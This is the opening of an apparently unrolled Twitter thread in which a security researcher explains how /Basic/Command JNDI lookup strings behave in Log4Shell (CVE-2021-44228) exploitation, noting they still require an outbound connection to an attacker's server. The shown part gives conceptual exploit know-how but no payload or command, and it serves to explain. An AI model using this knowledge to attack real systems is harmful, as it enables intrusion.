cybercrime connoisseur and synapse fanboy | hax @OSUSEC | tweets my own | @captainGeech@infosec.exchange
Dec 13, 2021 • 8 tweets • 6 min read
In a conversation I had with some folks yesterday about different exploit techniques for CVE-2021-44228, there was some confusion around how the /Basic/Command JNDI strings work. Let me break down what's happening here in a🧵(1/8)
#Log4Shell#log4j
First, these URIs are not a native part of the LDAP protocol. They aren't being handled by the JNDI lookup internally, and still require an outbound TCP connection to the attacker's malicious TCP server.